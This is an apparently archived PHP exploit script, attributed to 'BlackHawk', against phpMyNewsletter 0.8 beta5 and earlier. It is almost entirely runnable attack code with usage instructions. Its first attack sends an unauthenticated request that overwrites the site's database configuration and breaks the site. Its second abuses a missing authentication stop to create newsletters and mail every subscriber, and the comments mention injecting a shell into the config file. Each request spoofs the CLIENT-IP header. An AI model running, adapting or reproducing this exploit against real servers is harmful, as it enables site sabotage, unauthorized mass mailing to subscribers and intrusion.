phpMyNewsletter <= 0.8 (beta5) Multiple Vuln Exploit

#!/usr/bin/php&nbsp;-q&nbsp;-d&nbsp;short_open_tag=on <? echo&nbsp;\" phpMyNewsletter&nbsp;<=&nbsp;0.8&nbsp;(beta5)&nbsp;Multiple&nbsp;Vuln&nbsp;Exploit by&nbsp;BlackHawk&nbsp;<hawkgotyou@gmail.com>&nbsp;<http://itablackhawk.altervista.org> Thanks&nbsp;to&nbsp;rgod&nbsp;for&nbsp;the&nbsp;php&nbsp;code&nbsp;and&nbsp;Marty&nbsp;for&nbsp;the&nbsp;Love \"; if&nbsp;($argc<3)&nbsp;{ echo&nbsp;\"Usage:&nbsp;php&nbsp;\".$argv[0].\"&nbsp;Site&nbsp;AttackType&nbsp;Related Host:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;target&nbsp;server&nbsp;(ip/hostname) Path:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;path&nbsp;of&nbsp;phpMyNewsletter AttackType:&nbsp;&nbsp;&nbsp;&nbsp;1&nbsp;-&nbsp;>&nbsp;Delete&nbsp;Config&nbsp;Value&nbsp;(Rude&nbsp;Attack&nbsp;-&nbsp;can\'t&nbsp;do&nbsp;anything&nbsp;after) &nbsp;&nbsp;&nbsp;2&nbsp;-&nbsp;>&nbsp;Send&nbsp;an&nbsp;Email&nbsp;to&nbsp;all&nbsp;of&nbsp;the&nbsp;subscribers&nbsp;(Do&nbsp;not&nbsp;alter&nbsp;anything) Related:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1&nbsp;-&nbsp;>&nbsp;None &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;2&nbsp;-&nbsp;>&nbsp;OneWordTitle&nbsp;TextOfYourChoice &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Es: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;php&nbsp;\".$argv[0].\"&nbsp;localhost&nbsp;/myphpnl/&nbsp;Newsletter_Hacked&nbsp;BlackHawk&nbsp;Got&nbsp;Your&nbsp;Newsletter \"; die; } /* Attack&nbsp;N? vuln&nbsp;code&nbsp;is&nbsp;in&nbsp;index.php:&nbsp;the&nbsp;function&nbsp;to&nbsp;ceck&nbsp;the&nbsp;login&nbsp;is&nbsp;at&nbsp;line&nbsp;79, but&nbsp;the&nbsp;code&nbsp;to&nbsp;change&nbsp;the&nbsp;config&nbsp;file&nbsp;is&nbsp;at&nbsp;line&nbsp;33.. if&nbsp;mq=off&nbsp;you&nbsp;can&nbsp;inject&nbsp;a&nbsp;shell&nbsp;into&nbsp;the&nbsp;file.. Attack&nbsp;N? vuln&nbsp;code&nbsp;is&nbsp;in&nbsp;send_mod.php&nbsp;at&nbsp;line&nbsp;16: if(!checkAdminAccess($conf->admin_pass,&nbsp;$form_pass)) &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;header(\"Location:index.php\"); &nbsp; this&nbsp;is&nbsp;not&nbsp;a&nbsp;protection,&nbsp;so&nbsp;we&nbsp;can&nbsp;send&nbsp;previously&nbsp;created&nbsp;newsletter.. but&nbsp;in&nbsp;the&nbsp;same&nbsp;file&nbsp;there&nbsp;is&nbsp;a&nbsp;function&nbsp;to&nbsp;add&nbsp;new-newsletters.. so&nbsp;here&nbsp;it&nbsp;is&nbsp;a&nbsp;perfect&nbsp;spam&nbsp;sender&nbsp;program.. BlackHawk&nbsp;<hawkgotyou@gmail.com> */ error_reporting(0); ini_set(\"max_execution_time\",0); ini_set(\"default_socket_timeout\",5); function&nbsp;quick_dump($string) { &nbsp;&nbsp;$result=\'\';$exa=\'\';$cont=0; &nbsp;&nbsp;for&nbsp;($i=0;&nbsp;$i<=strlen($string)-1;&nbsp;$i++) &nbsp;&nbsp;{ &nbsp;&nbsp;&nbsp;if&nbsp;((ord($string[$i])&nbsp;<=&nbsp;32&nbsp;)&nbsp;|&nbsp;(ord($string[$i])&nbsp;>&nbsp;126&nbsp;)) &nbsp;&nbsp;&nbsp;{$result.=\"&nbsp;&nbsp;.\";} &nbsp;&nbsp;&nbsp;else &nbsp;&nbsp;&nbsp;{$result.=\"&nbsp;&nbsp;\".$string[$i];} &nbsp;&nbsp;&nbsp;if&nbsp;(strlen(dechex(ord($string[$i])))==2) &nbsp;&nbsp;&nbsp;{$exa.=\"&nbsp;\".dechex(ord($string[$i]));} &nbsp;&nbsp;&nbsp;else &nbsp;&nbsp;&nbsp;{$exa.=\"&nbsp;0\".dechex(ord($string[$i]));} &nbsp;&nbsp;&nbsp;$cont++;if&nbsp;($cont==15)&nbsp;{$cont=0;&nbsp;$result.=\" \";&nbsp;$exa.=\" \";} &nbsp;&nbsp;} &nbsp;return&nbsp;$exa.\" \".$result; } $proxy_regex&nbsp;=&nbsp;\'(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5})\'; function&nbsp;sendpacketii($packet) { &nbsp;&nbsp;global&nbsp;$proxy,&nbsp;$host,&nbsp;$port,&nbsp;$html,&nbsp;$proxy_regex; &nbsp;&nbsp;if&nbsp;($proxy==\'\')&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;$ock=fsockopen(gethostbyname($host),$port); &nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!$ock)&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\'No&nbsp;response&nbsp;from&nbsp;\'.$host.\':\'.$port;&nbsp;die; &nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;} &nbsp;&nbsp;else&nbsp;{ $c&nbsp;=&nbsp;preg_match($proxy_regex,$proxy); &nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!$c)&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\'Not&nbsp;a&nbsp;valid&nbsp;proxy...\';die; &nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;&nbsp;&nbsp;$parts=explode(\':\',$proxy); &nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\"Connecting&nbsp;to&nbsp;\".$parts[0].\":\".$parts[1].\"&nbsp;proxy... \"; &nbsp;&nbsp;&nbsp;&nbsp;$ock=fsockopen($parts[0],$parts[1]); &nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!$ock)&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\'No&nbsp;response&nbsp;from&nbsp;proxy...\';die; } &nbsp;&nbsp;} &nbsp;&nbsp;fputs($ock,$packet); &nbsp;&nbsp;if&nbsp;($proxy==\'\')&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;$html=\'\'; &nbsp;&nbsp;&nbsp;&nbsp;while&nbsp;(!feof($ock))&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$html.=fgets($ock); &nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;} &nbsp;&nbsp;else&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;$html=\'\'; &nbsp;&nbsp;&nbsp;&nbsp;while&nbsp;((!feof($ock))&nbsp;or&nbsp;(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$html.=fread($ock,1); &nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;} &nbsp;&nbsp;fclose($ock); } $host=$argv[1]; $path=$argv[2]; $attack_type=$argv[3]; $port=80; $proxy=\"\"; if&nbsp;(($path[0]<>\'/\')&nbsp;or&nbsp;($path[strlen($path)-1]<>\'/\'))&nbsp;{echo&nbsp;\'Error...&nbsp;check&nbsp;the&nbsp;path!\';&nbsp;die;} if&nbsp;($proxy==\'\')&nbsp;{$p=$path;}&nbsp;else&nbsp;{$p=\'http://\'.$host.\':\'.$port.$path;} switch($attack_type) { case&nbsp;1:&nbsp;//Config.php&nbsp;values&nbsp;delete echo&nbsp;\"&nbsp;-&nbsp;Executing&nbsp;Task.. \"; $data=\"file=1&db_host=hacked&db_login=hacked&db_pass=hacked&db_name=hacked&table_config=hacked\"; $packet=\"POST&nbsp;\".$p.\"admin/index.php?op=saveGlobalconfig&nbsp;HTTP/1.0 \"; $packet.=\"CLIENT-IP:&nbsp;999.999.999.999 \";//spoof $packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*&nbsp;/* \"; $packet.=\"Referer:&nbsp;http://\".$host.$path.\" \"; $packet.=\"Accept-Language:&nbsp;it \"; $packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded \"; $packet.=\"Accept-Encoding:&nbsp;gzip,&nbsp;deflate \"; $packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;6.0;&nbsp;Windows&nbsp;NT&nbsp;5.1;&nbsp;SV1) \"; $packet.=\"Host:&nbsp;\".$host.\" \"; $packet.=\"Content-Length:&nbsp;\".strlen($data).\" \"; $packet.=\"Connection:&nbsp;Close \"; $packet.=\"Cache-Control:&nbsp;no-cache \"; $packet.=$data; sendpacketii($packet); echo&nbsp;\"&nbsp;-&nbsp;All&nbsp;done..&nbsp;^_^ \"; break; case&nbsp;2:&nbsp;//Send&nbsp;NewsLetter $title=$argv[4]; $txt=\'\'; for&nbsp;($i=5;&nbsp;$i<=$argc-1;&nbsp;$i++){ $txt.=\"&nbsp;\".$argv[$i]; } echo&nbsp;\"&nbsp;-&nbsp;Executing&nbsp;Task&nbsp;1&nbsp;(Creating&nbsp;Newsletter) \"; $data=\"subject=\".urlencode($title.\'&nbsp;-&nbsp;Send&nbsp;With&nbsp;BlackHawk&nbsp;Exploit&nbsp;-\').\"&message=\".urlencode($txt.\'<br><br>&nbsp;-&nbsp;Send&nbsp;With&nbsp;BlackHawk&nbsp;Exploit&nbsp;-\').\"&format=html&list_id=1\"; $packet=\"POST&nbsp;\".$p.\"admin/send_mod.php&nbsp;HTTP/1.0 \"; $packet.=\"CLIENT-IP:&nbsp;999.999.999.999 \";//spoof $packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*&nbsp;/* \"; $packet.=\"Referer:&nbsp;http://\".$host.$path.\" \"; $packet.=\"Accept-Language:&nbsp;it \"; $packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded \"; $packet.=\"Accept-Encoding:&nbsp;gzip,&nbsp;deflate \"; $packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;6.0;&nbsp;Windows&nbsp;NT&nbsp;5.1;&nbsp;SV1) \"; $packet.=\"Host:&nbsp;\".$host.\" \"; $packet.=\"Content-Length:&nbsp;\".strlen($data).\" \"; $packet.=\"Connection:&nbsp;Close \"; $packet.=\"Cache-Control:&nbsp;no-cache \"; $packet.=$data; sendpacketii($packet); echo&nbsp;\"&nbsp;-&nbsp;Retrieving&nbsp;MsgID.. \"; $temp=&nbsp;explode(\'Location:&nbsp;\',&nbsp;$html); $x&nbsp;=&nbsp;explode(\" \",&nbsp;$temp[1]); $url_msgid=$x[0]; echo&nbsp;\"&nbsp;-&nbsp;Sending&nbsp;The&nbsp;EMail.. \"; $packet=\"GET&nbsp;\".$p.\"admin/$url_msgid&nbsp;HTTP/1.0 \"; $packet.=\"CLIENT-IP:&nbsp;999.999.999.999 \";//spoof $packet.=\"Referer:&nbsp;http://\".$host.$path.\" \"; $packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;6.0;&nbsp;Windows&nbsp;NT&nbsp;5.1;&nbsp;SV1) \"; $packet.=\"Host:&nbsp;\".$host.\" \"; $packet.=\"Connection:&nbsp;Close \"; echo&nbsp;$packet; sendpacketii($packet); echo&nbsp;\"&nbsp;-&nbsp;Email&nbsp;Sent \"; echo&nbsp;$html; } ?> &nbsp;